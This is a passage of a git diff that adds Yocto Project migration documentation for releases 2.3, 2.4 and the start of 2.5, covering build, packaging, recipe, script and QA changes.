+   has a ``pkg_postinst`` that calls ``systemctl`` if "systemd" is in
+   :term:`DISTRO_FEATURES`. In the example,
+   ``systemd-systemctl-native`` is added to ``PACKAGE_WRITE_DEPS``,
+   which is also conditional on "systemd" being in ``DISTRO_FEATURES``.
+
+-  Examine Recipes that Use ``SSTATEPOSTINSTFUNCS``: You need to
+   examine any recipe that uses ``SSTATEPOSTINSTFUNCS`` and determine
+   steps to take.
+
+   Functions added to ``SSTATEPOSTINSTFUNCS`` are still called as they
+   were in previous Yocto Project releases. However, since a separate
+   sysroot is now being populated for every recipe and if existing
+   functions being called through ``SSTATEPOSTINSTFUNCS`` are doing
+   relocation, then you will need to change these to use a
+   post-installation script that is installed by a function added to
+   :term:`SYSROOT_PREPROCESS_FUNCS`.
+
+   For an example, see the ``pixbufcache`` class in ``meta/classes/`` in
+   the :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`.
+
+   .. note::
+
+      The
+      SSTATEPOSTINSTFUNCS
+      variable itself is now deprecated in favor of the
+      do_populate_sysroot[postfuncs]
+      task. Consequently, if you do still have any function or functions
+      that need to be called after the sysroot component is created for
+      a recipe, then you would be well advised to take steps to use a
+      post installation script as described previously. Taking these
+      steps prepares your code for when
+      SSTATEPOSTINSTFUNCS
+      is removed in a future Yocto Project release.
+
+-  *Specify the Sysroot when Using Certain External Scripts:* Because
+   the shared sysroot is now gone, the scripts
+   ``oe-find-native-sysroot`` and ``oe-run-native`` have been changed
+   such that you need to specify which recipe's
+   :term:`STAGING_DIR_NATIVE` is used.
+
+.. note::
+
+   You can find more information on how recipe-specific sysroots work in
+   the ":ref:`ref-classes-staging`" section.
+
+.. _migration-2.3-path-variable:
+
+``PATH`` Variable
+-----------------
+
+Within the environment used to run build tasks, the environment variable
+``PATH`` is now sanitized such that the normal native binary paths
+(``/bin``, ``/sbin``, ``/usr/bin`` and so forth) are removed and a
+directory containing symbolic links linking only to the binaries from
+the host mentioned in the :term:`HOSTTOOLS` and
+:term:`HOSTTOOLS_NONFATAL` variables is added
+to ``PATH``.
+
+Consequently, any native binaries provided by the host that you need to
+call needs to be in one of these two variables at the configuration
+level.
+
+Alternatively, you can add a native recipe (i.e. ``-native``) that
+provides the binary to the recipe's :term:`DEPENDS`
+value.
+
+.. note::
+
+   PATH
+   is not sanitized in the same way within ``devshell``.
+   If it were, you would have difficulty running host tools for
+   development and debugging within the shell.
+
+.. _migration-2.3-scripts:
+
+Changes to Scripts
+------------------
+
+The following changes to scripts took place:
+
+-  ``oe-find-native-sysroot``: The usage for the
+   ``oe-find-native-sysroot`` script has changed to the following:
+   ::
+
+      $ . oe-find-native-sysroot recipe
+
+   You must now supply a recipe for recipe
+   as part of the command. Prior to the Yocto Project 2.3 release, it
+   was not necessary to provide the script with the command.
+
+-  ``oe-run-native``: The usage for the ``oe-run-native`` script has
+   changed to the following:
+   ::
+
+      $ oe-run-native native_recipe tool
+
+   You must
+   supply the name of the native recipe and the tool you want to run as
+   part of the command. Prior to the Yocto Project 2.3 release, it
+   was not necessary to provide the native recipe with the command.
+
+-  ``cleanup-workdir``: The ``cleanup-workdir`` script has been
+   removed because the script was found to be deleting files it should
+   not have, which lead to broken build trees. Rather than trying to
+   delete portions of :term:`TMPDIR` and getting it wrong,
+   it is recommended that you delete ``TMPDIR`` and have it restored
+   from shared state (sstate) on subsequent builds.
+
+-  ``wipe-sysroot``: The ``wipe-sysroot`` script has been removed as
+   it is no longer needed with recipe-specific sysroots.
+
+.. _migration-2.3-functions:
+
+Changes to Functions
+--------------------
+
+The previously deprecated ``bb.data.getVar()``, ``bb.data.setVar()``,
+and related functions have been removed in favor of ``d.getVar()``,
+``d.setVar()``, and so forth.
+
+You need to fix any references to these old functions.
+
+.. _migration-2.3-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The following changes took place for BitBake:
+
+-  *BitBake's Graphical Dependency Explorer UI Replaced:* BitBake's
+   graphical dependency explorer UI ``depexp`` was replaced by
+   ``taskexp`` ("Task Explorer"), which provides a graphical way of
+   exploring the ``task-depends.dot`` file. The data presented by Task
+   Explorer is much more accurate than the data that was presented by
+   ``depexp``. Being able to visualize the data is an often requested
+   feature as standard ``*.dot`` file viewers cannot usual cope with the
+   size of the ``task-depends.dot`` file.
+
+-  *BitBake "-g" Output Changes:* The ``package-depends.dot`` and
+   ``pn-depends.dot`` files as previously generated using the
+   ``bitbake -g`` command have been removed. A ``recipe-depends.dot``
+   file is now generated as a collapsed version of ``task-depends.dot``
+   instead.
+
+   The reason for this change is because ``package-depends.dot`` and
+   ``pn-depends.dot`` largely date back to a time before task-based
+   execution and do not take into account task-level dependencies
+   between recipes, which could be misleading.
+
+-  *Mirror Variable Splitting Changes:* Mirror variables including
+   :term:`MIRRORS`, :term:`PREMIRRORS`,
+   and :term:`SSTATE_MIRRORS` can now separate
+   values entirely with spaces. Consequently, you no longer need "\\n".
+   BitBake looks for pairs of values, which simplifies usage. There
+   should be no change required to existing mirror variable values
+   themselves.
+
+-  *The Subversion (SVN) Fetcher Uses an "ssh" Parameter and Not an
+   "rsh" Parameter:* The SVN fetcher now takes an "ssh" parameter
+   instead of an "rsh" parameter. This new optional parameter is used
+   when the "protocol" parameter is set to "svn+ssh". You can only use
+   the new parameter to specify the ``ssh`` program used by SVN. The SVN
+   fetcher passes the new parameter through the ``SVN_SSH`` environment
+   variable during the :ref:`ref-tasks-fetch` task.
+
+   See the ":ref:`bitbake:svn-fetcher`"
+   section in the BitBake
+   User Manual for additional information.
+
+-  ``BB_SETSCENE_VERIFY_FUNCTION`` and ``BB_SETSCENE_VERIFY_FUNCTION2``
+   Removed: Because the mechanism they were part of is no longer
+   necessary with recipe-specific sysroots, the
+   ``BB_SETSCENE_VERIFY_FUNCTION`` and ``BB_SETSCENE_VERIFY_FUNCTION2``
+   variables have been removed.
+
+.. _migration-2.3-absolute-symlinks:
+
+Absolute Symbolic Links
+-----------------------
+
+Absolute symbolic links (symlinks) within staged files are no longer
+permitted and now trigger an error. Any explicit creation of symlinks
+can use the ``lnr`` script, which is a replacement for ``ln -r``.
+
+If the build scripts in the software that the recipe is building are
+creating a number of absolute symlinks that need to be corrected, you
+can inherit ``relative_symlinks`` within the recipe to turn those
+absolute symlinks into relative symlinks.
+
+.. _migration-2.3-gplv2-and-gplv3-moves:
+
+GPLv2 Versions of GPLv3 Recipes Moved
+-------------------------------------
+
+Older GPLv2 versions of GPLv3 recipes have moved to a separate
+``meta-gplv2`` layer.
+
+If you use :term:`INCOMPATIBLE_LICENSE` to
+exclude GPLv3 or set :term:`PREFERRED_VERSION`
+to substitute a GPLv2 version of a GPLv3 recipe, then you must add the
+``meta-gplv2`` layer to your configuration.
+
+.. note::
+
+   You can ``find meta-gplv2`` layer in the OpenEmbedded layer index at
+   https://layers.openembedded.org/layerindex/branch/master/layer/meta-gplv2/.
+
+These relocated GPLv2 recipes do not receive the same level of
+maintenance as other core recipes. The recipes do not get security fixes
+and upstream no longer maintains them. In fact, the upstream community
+is actively hostile towards people that use the old versions of the
+recipes. Moving these recipes into a separate layer both makes the
+different needs of the recipes clearer and clearly identifies the number
+of these recipes.
+
+.. note::
+
+   The long-term solution might be to move to BSD-licensed replacements
+   of the GPLv3 components for those that need to exclude GPLv3-licensed
+   components from the target system. This solution will be investigated
+   for future Yocto Project releases.
+
+.. _migration-2.3-package-management-changes:
+
+Package Management Changes
+--------------------------
+
+The following package management changes took place:
+
+-  Smart package manager is replaced by DNF package manager. Smart has
+   become unmaintained upstream, is not ported to Python 3.x.
+   Consequently, Smart needed to be replaced. DNF is the only feasible
+   candidate.
+
+   The change in functionality is that the on-target runtime package
+   management from remote package feeds is now done with a different
+   tool that has a different set of command-line options. If you have
+   scripts that call the tool directly, or use its API, they need to be
+   fixed.
+
+   For more information, see the `DNF
+   Documentation <http://dnf.readthedocs.io/en/latest/>`__.
+
+-  Rpm 5.x is replaced with Rpm 4.x. This is done for two major reasons:
+
+   -  DNF is API-incompatible with Rpm 5.x and porting it and
+      maintaining the port is non-trivial.
+
+   -  Rpm 5.x itself has limited maintenance upstream, and the Yocto
+      Project is one of the very few remaining users.
+
+-  Berkeley DB 6.x is removed and Berkeley DB 5.x becomes the default:
+
+   -  Version 6.x of Berkeley DB has largely been rejected by the open
+      source community due to its AGPLv3 license. As a result, most
+      mainstream open source projects that require DB are still
+      developed and tested with DB 5.x.
+
+   -  In OE-core, the only thing that was requiring DB 6.x was Rpm 5.x.
+      Thus, no reason exists to continue carrying DB 6.x in OE-core.
+
+-  ``createrepo`` is replaced with ``createrepo_c``.
+
+   ``createrepo_c`` is the current incarnation of the tool that
+   generates remote repository metadata. It is written in C as compared
+   to ``createrepo``, which is written in Python. ``createrepo_c`` is
+   faster and is maintained.
+
+-  Architecture-independent RPM packages are "noarch" instead of "all".
+
+   This change was made because too many places in DNF/RPM4 stack
+   already make that assumption. Only the filenames and the architecture
+   tag has changed. Nothing else has changed in OE-core system,
+   particularly in the :ref:`allarch.bbclass <ref-classes-allarch>`
+   class.
+
+-  Signing of remote package feeds using ``PACKAGE_FEED_SIGN`` is not
+   currently supported. This issue will be fully addressed in a future
+   Yocto Project release. See :yocto_bugs:`defect 11209 </show_bug.cgi?id=11209>`
+   for more information on a solution to package feed signing with RPM
+   in the Yocto Project 2.3 release.
+
+-  OPKG now uses the libsolv backend for resolving package dependencies
+   by default. This is vastly superior to OPKG's internal ad-hoc solver
+   that was previously used. This change does have a small impact on
+   disk (around 500 KB) and memory footprint.
+
+   .. note::
+
+      For further details on this change, see the
+      :yocto_git:`commit message </cgit/cgit.cgi/poky/commit/?id=f4d4f99cfbc2396e49c1613a7d237b9e57f06f81>`.
+
+.. _migration-2.3-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+-  ``linux-yocto 4.8``: Version 4.8 has been removed. Versions 4.1
+   (LTSI), 4.4 (LTS), 4.9 (LTS/LTSI) and 4.10 are now present.
+
+-  ``python-smartpm``: Functionally replaced by ``dnf``.
+
+-  ``createrepo``: Replaced by the ``createrepo-c`` recipe.
+
+-  ``rpmresolve``: No longer needed with the move to RPM 4 as RPM
+   itself is used instead.
+
+-  ``gstreamer``: Removed the GStreamer Git version recipes as they
+   have been stale. ``1.10.``\ x recipes are still present.
+
+-  ``alsa-conf-base``: Merged into ``alsa-conf`` since ``libasound``
+   depended on both. Essentially, no way existed to install only one of
+   these.
+
+-  ``tremor``: Moved to ``meta-multimedia``. Fixed-integer Vorbis
+   decoding is not needed by current hardware. Thus, GStreamer's ivorbis
+   plugin has been disabled by default eliminating the need for the
+   ``tremor`` recipe in :term:`OpenEmbedded-Core (OE-Core)`.
+
+-  ``gummiboot``: Replaced by ``systemd-boot``.
+
+.. _migration-2.3-wic-changes:
+
+Wic Changes
+-----------
+
+The following changes have been made to Wic:
+
+.. note::
+
+   For more information on Wic, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:creating partitioned images using wic`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  *Default Output Directory Changed:* Wic's default output directory is
+   now the current directory by default instead of the unusual
+   ``/var/tmp/wic``.
+
+   The "-o" and "--outdir" options remain unchanged and are used to
+   specify your preferred output directory if you do not want to use the
+   default directory.
+
+-  *fsimage Plug-in Removed:* The Wic fsimage plugin has been removed as
+   it duplicates functionality of the rawcopy plugin.
+
+.. _migration-2.3-qa-changes:
+
+QA Changes
+----------
+
+The following QA checks have changed:
+
+-  ``unsafe-references-in-binaries``: The
+   ``unsafe-references-in-binaries`` QA check, which was disabled by
+   default, has now been removed. This check was intended to detect
+   binaries in ``/bin`` that link to libraries in ``/usr/lib`` and have
+   the case where the user has ``/usr`` on a separate filesystem to
+   ``/``.
+
+   The removed QA check was buggy. Additionally, ``/usr`` residing on a
+   separate partition from ``/`` is now a rare configuration.
+   Consequently, ``unsafe-references-in-binaries`` was removed.
+
+-  ``file-rdeps``: The ``file-rdeps`` QA check is now an error by
+   default instead of a warning. Because it is an error instead of a
+   warning, you need to address missing runtime dependencies.
+
+   For additional information, see the
+   :ref:`insane <ref-classes-insane>` class and the
+   ":ref:`ref-manual/ref-qa-checks:errors and warnings`" section.
+
+.. _migration-2.3-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes have occurred:
+
+-  In this release, a number of recipes have been changed to ignore the
+   ``largefile`` :term:`DISTRO_FEATURES` item,
+   enabling large file support unconditionally. This feature has always
+   been enabled by default. Disabling the feature has not been widely
+   tested.
+
+   .. note::
+
+      Future releases of the Yocto Project will remove entirely the
+      ability to disable the
+      largefile
+      feature, which would make it unconditionally enabled everywhere.
+
+-  If the :term:`DISTRO_VERSION` value contains
+   the value of the :term:`DATE` variable, which is the
+   default between Poky releases, the ``DATE`` value is explicitly
+   excluded from ``/etc/issue`` and ``/etc/issue.net``, which is
+   displayed at the login prompt, in order to avoid conflicts with
+   Multilib enabled. Regardless, the ``DATE`` value is inaccurate if the
+   ``base-files`` recipe is restored from shared state (sstate) rather
+   than rebuilt.
+
+   If you need the build date recorded in ``/etc/issue*`` or anywhere
+   else in your image, a better method is to define a post-processing
+   function to do it and have the function called from
+   :term:`ROOTFS_POSTPROCESS_COMMAND`.
+   Doing so ensures the value is always up-to-date with the created
+   image.
+
+-  Dropbear's ``init`` script now disables DSA host keys by default.
+   This change is in line with the systemd service file, which supports
+   RSA keys only, and with recent versions of OpenSSH, which deprecates
+   DSA host keys.
+
+-  The :ref:`buildhistory <ref-classes-buildhistory>` class now
+   correctly uses tabs as separators between all columns in
+   ``installed-package-sizes.txt`` in order to aid import into other
+   tools.
+
+-  The ``USE_LDCONFIG`` variable has been replaced with the "ldconfig"
+   ``DISTRO_FEATURES`` feature. Distributions that previously set:
+   ::
+
+      USE_LDCONFIG = "0"
+
+   should now instead use the following:
+
+   ::
+
+      DISTRO_FEATURES_BACKFILL_CONSIDERED_append = " ldconfig"
+
+-  The default value of
+   :term:`COPYLEFT_LICENSE_INCLUDE` now
+   includes all versions of AGPL licenses in addition to GPL and LGPL.
+
+   .. note::
+
+      The default list is not intended to be guaranteed as a complete
+      safe list. You should seek legal advice based on what you are
+      distributing if you are unsure.
+
+-  Kernel module packages are now suffixed with the kernel version in
+   order to allow module packages from multiple kernel versions to
+   co-exist on a target system. If you wish to return to the previous
+   naming scheme that does not include the version suffix, use the
+   following:
+   ::
+
+      KERNEL_MODULE_PACKAGE_SUFFIX = ""
+
+-  Removal of ``libtool`` ``*.la`` files is now enabled by default. The
+   ``*.la`` files are not actually needed on Linux and relocating them
+   is an unnecessary burden.
+
+   If you need to preserve these ``.la`` files (e.g. in a custom
+   distribution), you must change
+   :term:`INHERIT_DISTRO` such that
+   "remove-libtool" is not included in the value.
+
+-  Extensible SDKs built for GCC 5+ now refuse to install on a
+   distribution where the host GCC version is 4.8 or 4.9. This change
+   resulted from the fact that the installation is known to fail due to
+   the way the ``uninative`` shared state (sstate) package is built. See
+   the :ref:`uninative <ref-classes-uninative>` class for additional
+   information.
+
+-  All native and nativesdk recipes now use a separate
+   ``DISTRO_FEATURES`` value instead of sharing the value used by
+   recipes for the target, in order to avoid unnecessary rebuilds.
+
+   The ``DISTRO_FEATURES`` for ``native`` recipes is
+   :term:`DISTRO_FEATURES_NATIVE` added to
+   an intersection of ``DISTRO_FEATURES`` and
+   :term:`DISTRO_FEATURES_FILTER_NATIVE`.
+
+   For nativesdk recipes, the corresponding variables are
+   :term:`DISTRO_FEATURES_NATIVESDK`
+   and
+   :term:`DISTRO_FEATURES_FILTER_NATIVESDK`.
+
+-  The ``FILESDIR`` variable, which was previously deprecated and rarely
+   used, has now been removed. You should change any recipes that set
+   ``FILESDIR`` to set :term:`FILESPATH` instead.
+
+-  The ``MULTIMACH_HOST_SYS`` variable has been removed as it is no
+   longer needed with recipe-specific sysroots.
+
+
diff --git a/documentation/ref-manual/migration-2.4.rst b/documentation/ref-manual/migration-2.4.rst
new file mode 100644
index 0000000000..260b3204b6
--- /dev/null
+++ b/documentation/ref-manual/migration-2.4.rst
@@ -0,0 +1,327 @@
+Moving to the Yocto Project 2.4 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.4 Release from the prior release.
+
+.. _migration-2.4-memory-resident-mode:
+
+Memory Resident Mode
+--------------------
+
+A persistent mode is now available in BitBake's default operation,
+replacing its previous "memory resident mode" (i.e.
+``oe-init-build-env-memres``). Now you only need to set
+:term:`BB_SERVER_TIMEOUT` to a timeout (in
+seconds) and BitBake's server stays resident for that amount of time
+between invocations. The ``oe-init-build-env-memres`` script has been
+removed since a separate environment setup script is no longer needed.
+
+.. _migration-2.4-packaging-changes:
+
+Packaging Changes
+-----------------
+
+This section provides information about packaging changes that have
+occurred:
+
+-  ``python3`` Changes:
+
+   -  The main "python3" package now brings in all of the standard
+      Python 3 distribution rather than a subset. This behavior matches
+      what is expected based on traditional Linux distributions. If you
+      wish to install a subset of Python 3, specify ``python-core`` plus
+      one or more of the individual packages that are still produced.
+
+   -  ``python3``: The ``bz2.py``, ``lzma.py``, and
+      ``_compression.py`` scripts have been moved from the
+      ``python3-misc`` package to the ``python3-compression`` package.
+
+-  ``binutils``: The ``libbfd`` library is now packaged in a separate
+   "libbfd" package. This packaging saves space when certain tools (e.g.
+   ``perf``) are installed. In such cases, the tools only need
+   ``libbfd`` rather than all the packages in ``binutils``.
+
+-  ``util-linux`` Changes:
+
+   -  The ``su`` program is now packaged in a separate "util-linux-su"
+      package, which is only built when "pam" is listed in the
+      :term:`DISTRO_FEATURES` variable.
+      ``util-linux`` should not be installed unless it is needed because
+      ``su`` is normally provided through the shadow file format. The
+      main ``util-linux`` package has runtime dependencies (i.e.
+      :term:`RDEPENDS`) on the ``util-linux-su`` package
+      when "pam" is in ``DISTRO_FEATURES``.
+
+   -  The ``switch_root`` program is now packaged in a separate
+      "util-linux-switch-root" package for small initramfs images that
+      do not need the whole ``util-linux`` package or the busybox
+      binary, which are both much larger than ``switch_root``. The main
+      ``util-linux`` package has a recommended runtime dependency (i.e.
+      :term:`RRECOMMENDS`) on the
+      ``util-linux-switch-root`` package.
+
+   -  The ``ionice`` program is now packaged in a separate
+      "util-linux-ionice" package. The main ``util-linux`` package has a
+      recommended runtime dependency (i.e. ``RRECOMMENDS``) on the
+      ``util-linux-ionice`` package.
+
+-  ``initscripts``: The ``sushell`` program is now packaged in a
+   separate "initscripts-sushell" package. This packaging change allows
+   systems to pull ``sushell`` in when ``selinux`` is enabled. The
+   change also eliminates needing to pull in the entire ``initscripts``
+   package. The main ``initscripts`` package has a runtime dependency
+   (i.e. ``RDEPENDS``) on the ``sushell`` package when "selinux" is in
+   ``DISTRO_FEATURES``.
+
+-  ``glib-2.0``: The ``glib-2.0`` package now has a recommended
+   runtime dependency (i.e. ``RRECOMMENDS``) on the ``shared-mime-info``
+   package, since large portions of GIO are not useful without the MIME
+   database. You can remove the dependency by using the
+   :term:`BAD_RECOMMENDATIONS` variable if
+   ``shared-mime-info`` is too large and is not required.
+
+-  *Go Standard Runtime:* The Go standard runtime has been split out
+   from the main ``go`` recipe into a separate ``go-runtime`` recipe.
+
+.. _migration-2.4-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+-  ``acpitests``: This recipe is not maintained.
+
+-  ``autogen-native``: No longer required by Grub, oe-core, or
+   meta-oe.
+
+-  ``bdwgc``: Nothing in OpenEmbedded-Core requires this recipe. It
+   has moved to meta-oe.
+
+-  ``byacc``: This recipe was only needed by rpm 5.x and has moved to
+   meta-oe.
+
+-  ``gcc (5.4)``: The 5.4 series dropped the recipe in favor of 6.3 /
+   7.2.
+
+-  ``gnome-common``: Deprecated upstream and no longer needed.
+
+-  ``go-bootstrap-native``: Go 1.9 does its own bootstrapping so this
+   recipe has been removed.
+
+-  ``guile``: This recipe was only needed by ``autogen-native`` and
+   ``remake``. The recipe is no longer needed by either of these
+   programs.
+
+-  ``libclass-isa-perl``: This recipe was previously needed for LSB 4,
+   no longer needed.
+
+-  ``libdumpvalue-perl``: This recipe was previously needed for LSB 4,
+   no longer needed.
+
+-  ``libenv-perl``: This recipe was previously needed for LSB 4, no
+   longer needed.
+
+-  ``libfile-checktree-perl``: This recipe was previously needed for
+   LSB 4, no longer needed.
+
+-  ``libi18n-collate-perl``: This recipe was previously needed for LSB
+   4, no longer needed.
+
+-  ``libiconv``: This recipe was only needed for ``uclibc``, which was
+   removed in the previous release. ``glibc`` and ``musl`` have their
+   own implementations. ``meta-mingw`` still needs ``libiconv``, so it
+   has been moved to ``meta-mingw``.
+
+-  ``libpng12``: This recipe was previously needed for LSB. The
+   current ``libpng`` is 1.6.x.
+
+-  ``libpod-plainer-perl``: This recipe was previously needed for LSB
+   4, no longer needed.
+
+-  ``linux-yocto (4.1)``: This recipe was removed in favor of 4.4,
+   4.9, 4.10 and 4.12.
+
+-  ``mailx``: This recipe was previously only needed for LSB
+   compatibility, and upstream is defunct.
+
+-  ``mesa (git version only)``: The git version recipe was stale with
+   respect to the release version.
+
+-  ``ofono (git version only)``: The git version recipe was stale with
+   respect to the release version.
+
+-  ``portmap``: This recipe is obsolete and is superseded by
+   ``rpcbind``.
+
+-  ``python3-pygpgme``: This recipe is old and unmaintained. It was
+   previously required by ``dnf``, which has switched to official
+   ``gpgme`` Python bindings.
+
+-  ``python-async``: This recipe has been removed in favor of the
+   Python 3 version.
+
+-  ``python-gitdb``: This recipe has been removed in favor of the
+   Python 3 version.
+
+-  ``python-git``: This recipe was removed in favor of the Python 3
+   version.
+
+-  ``python-mako``: This recipe was removed in favor of the Python 3
+   version.
+
+-  ``python-pexpect``: This recipe was removed in favor of the Python
+   3 version.
+
+-  ``python-ptyprocess``: This recipe was removed in favor of Python
+   the 3 version.
+
+-  ``python-pycurl``: Nothing is using this recipe in
+   OpenEmbedded-Core (i.e. ``meta-oe``).
+
+-  ``python-six``: This recipe was removed in favor of the Python 3
+   version.
+
+-  ``python-smmap``: This recipe was removed in favor of the Python 3
+   version.
+
+-  ``remake``: Using ``remake`` as the provider of ``virtual/make`` is
+   broken. Consequently, this recipe is not needed in OpenEmbedded-Core.
+
+.. _migration-2.4-kernel-device-tree-move:
+
+Kernel Device Tree Move
+-----------------------
+
+Kernel Device Tree support is now easier to enable in a kernel recipe.
+The Device Tree code has moved to a
+:ref:`kernel-devicetree <ref-classes-kernel-devicetree>` class.
+Functionality is automatically enabled for any recipe that inherits the
+:ref:`kernel <ref-classes-kernel>` class and sets the
+:term:`KERNEL_DEVICETREE` variable. The
+previous mechanism for doing this,
+``meta/recipes-kernel/linux/linux-dtb.inc``, is still available to avoid
+breakage, but triggers a deprecation warning. Future releases of the
+Yocto Project will remove ``meta/recipes-kernel/linux/linux-dtb.inc``.
+It is advisable to remove any ``require`` statements that request
+``meta/recipes-kernel/linux/linux-dtb.inc`` from any custom kernel
+recipes you might have. This will avoid breakage in post 2.4 releases.
+
+.. _migration-2.4-package-qa-changes:
+
+Package QA Changes
+------------------
+
+The following package QA changes took place:
+
+-  The "unsafe-references-in-scripts" QA check has been removed.
+
+-  If you refer to ``${COREBASE}/LICENSE`` within
+   :term:`LIC_FILES_CHKSUM` you receive a
+   warning because this file is a description of the license for
+   OE-Core. Use ``${COMMON_LICENSE_DIR}/MIT`` if your recipe is
+   MIT-licensed and you cannot use the preferred method of referring to
+   a file within the source tree.
+
+.. _migration-2.4-readme-changes:
+
+``README`` File Changes
+-----------------------
+
+The following are changes to ``README`` files:
+
+-  The main Poky ``README`` file has been moved to the ``meta-poky``
+   layer and has been renamed ``README.poky``. A symlink has been
+   created so that references to the old location work.
+
+-  The ``README.hardware`` file has been moved to ``meta-yocto-bsp``. A
+   symlink has been created so that references to the old location work.
+
+-  A ``README.qemu`` file has been created with coverage of the
+   ``qemu*`` machines.
+
+.. _migration-2.4-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following are additional changes:
+
+-  The ``ROOTFS_PKGMANAGE_BOOTSTRAP`` variable and any references to it
+   have been removed. You should remove this variable from any custom
+   recipes.
+
+-  The ``meta-yocto`` directory has been removed.
+
+   .. note::
+
+      In the Yocto Project 2.1 release
+      meta-yocto
+      was renamed to
+      meta-poky
+      and the
+      meta-yocto
+      subdirectory remained to avoid breaking existing configurations.
+
+-  The ``maintainers.inc`` file, which tracks maintainers by listing a
+   primary person responsible for each recipe in OE-Core, has been moved
+   from ``meta-poky`` to OE-Core (i.e. from
+   ``meta-poky/conf/distro/include`` to ``meta/conf/distro/include``).
+
+-  The :ref:`buildhistory <ref-classes-buildhistory>` class now makes
+   a single commit per build rather than one commit per subdirectory in
+   the repository. This behavior assumes the commits are enabled with
+   :term:`BUILDHISTORY_COMMIT` = "1", which
+   is typical. Previously, the ``buildhistory`` class made one commit
+   per subdirectory in the repository in order to make it easier to see
+   the changes for a particular subdirectory. To view a particular
+   change, specify that subdirectory as the last parameter on the
+   ``git show`` or ``git diff`` commands.
+
+-  The ``x86-base.inc`` file, which is included by all x86-based machine
+   configurations, now sets :term:`IMAGE_FSTYPES`
+   using ``?=`` to "live" rather than appending with ``+=``. This change
+   makes the default easier to override.
+
+-  BitBake fires multiple "BuildStarted" events when multiconfig is
+   enabled (one per configuration). For more information, see the
+   ":ref:`Events <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:events>`" section in the BitBake User
+   Manual.
+
+-  By default, the ``security_flags.inc`` file sets a
+   :term:`GCCPIE` variable with an option to enable
+   Position Independent Executables (PIE) within ``gcc``. Enabling PIE
+   in the GNU C Compiler (GCC), makes Return Oriented Programming (ROP)
+   attacks much more difficult to execute.
+
+-  OE-Core now provides a ``bitbake-layers`` plugin that implements a
+   "create-layer" subcommand. The implementation of this subcommand has
+   resulted in the ``yocto-layer`` script being deprecated and will
+   likely be removed in the next Yocto Project release.
+
+-  The ``vmdk``, ``vdi``, and ``qcow2`` image file types are now used in
+   conjunction with the "wic" image type through ``CONVERSION_CMD``.
+   Consequently, the equivalent image types are now ``wic.vmdk``,
+   ``wic.vdi``, and ``wic.qcow2``, respectively.
+
+-  ``do_image_<type>[depends]`` has replaced ``IMAGE_DEPENDS_<type>``.
+   If you have your own classes that implement custom image types, then
+   you need to update them.
+
+-  OpenSSL 1.1 has been introduced. However, the default is still 1.0.x
+   through the :term:`PREFERRED_VERSION`
+   variable. This preference is set is due to the remaining
+   compatibility issues with other software. The
+   :term:`PROVIDES` variable in the openssl 1.0 recipe
+   now includes "openssl10" as a marker that can be used in
+   :term:`DEPENDS` within recipes that build software
+   that still depend on OpenSSL 1.0.
+
+-  To ensure consistent behavior, BitBake's "-r" and "-R" options (i.e.
+   prefile and postfile), which are used to read or post-read additional
+   configuration files from the command line, now only affect the
+   current BitBake command. Before these BitBake changes, these options
+   would "stick" for future executions.
+
+
diff --git a/documentation/ref-manual/migration-2.5.rst b/documentation/ref-manual/migration-2.5.rst
new file mode 100644
index 0000000000..1aeddc81c3
--- /dev/null
+++ b/documentation/ref-manual/migration-2.5.rst
@@ -0,0 +1,310 @@
+Moving to the Yocto Project 2.5 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.5 Release from the prior release.
+
+.. _migration-2.5-packaging-changes:
+
+Packaging Changes
+-----------------
+
+This section provides information about packaging changes that have
+occurred:
+
+-  ``bind-libs``: The libraries packaged by the bind recipe are in a
+   separate ``bind-libs`` package.
+
+-  ``libfm-gtk``: The ``libfm`` GTK+ bindings are split into a
+   separate ``libfm-gtk`` package.
+
+-  ``flex-libfl``: The flex recipe splits out libfl into a separate
+   ``flex-libfl`` package to avoid too many dependencies being pulled in
+   where only the library is needed.
+
+-  ``grub-efi``: The ``grub-efi`` configuration is split into a
+   separate ``grub-bootconf`` recipe. However, the dependency
+   relationship from ``grub-efi`` is through a virtual/grub-bootconf
+   provider making it possible to have your own recipe provide the
+   dependency. Alternatively, you can use a BitBake append file to bring
+   the configuration back into the ``grub-efi`` recipe.
+
+-  *armv7a Legacy Package Feed Support:* Legacy support is removed for
+   transitioning from ``armv7a`` to ``armv7a-vfp-neon`` in package
+   feeds, which was previously enabled by setting
+   ``PKGARCHCOMPAT_ARMV7A``. This transition occurred in 2011 and active
+   package feeds should by now be updated to the new naming.
+
+.. _migration-2.5-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+-  ``gcc``: The version 6.4 recipes are replaced by 7.x.
+
+-  ``gst-player``: Renamed to ``gst-examples`` as per upstream.
+
+-  ``hostap-utils``: This software package is obsolete.
+
+-  ``latencytop``: This recipe is no longer maintained upstream. The
+   last release was in 2009.
+
+-  ``libpfm4``: The only file that requires this recipe is
+   ``oprofile``, which has been removed.
+
+-  ``linux-yocto``: The version 4.4, 4.9, and 4.10 recipes have been
+   removed. Versions 4.12, 4.14, and 4.15 remain.
+
+-  ``man``: This recipe has been replaced by modern ``man-db``
+
+-  ``mkelfimage``: This tool has been removed in the upstream coreboot
+   project, and is no longer needed with the removal of the ELF image
+   type.
+
+-  ``nativesdk-postinst-intercept``: This recipe is not maintained.
+
+-  ``neon``: This software package is no longer maintained upstream
+   and is no longer needed by anything in OpenEmbedded-Core.
+
+-  ``oprofile``: The functionality of this recipe is replaced by
+   ``perf`` and keeping compatibility on an ongoing basis with ``musl``
+   is difficult.
+
+-  ``pax``: This software package is obsolete.
+
+-  ``stat``: This software package is not maintained upstream.
+   ``coreutils`` provides a modern stat binary.
+
+-  ``zisofs-tools-native``: This recipe is no longer needed because
+   the compressed ISO image feature has been removed.
+
+.. _migration-2.5-scripts-and-tools-changes:
+
+Scripts and Tools Changes
+-------------------------
+
+The following are changes to scripts and tools:
+
+-  ``yocto-bsp``, ``yocto-kernel``, and ``yocto-layer``: The
+   ``yocto-bsp``, ``yocto-kernel``, and ``yocto-layer`` scripts
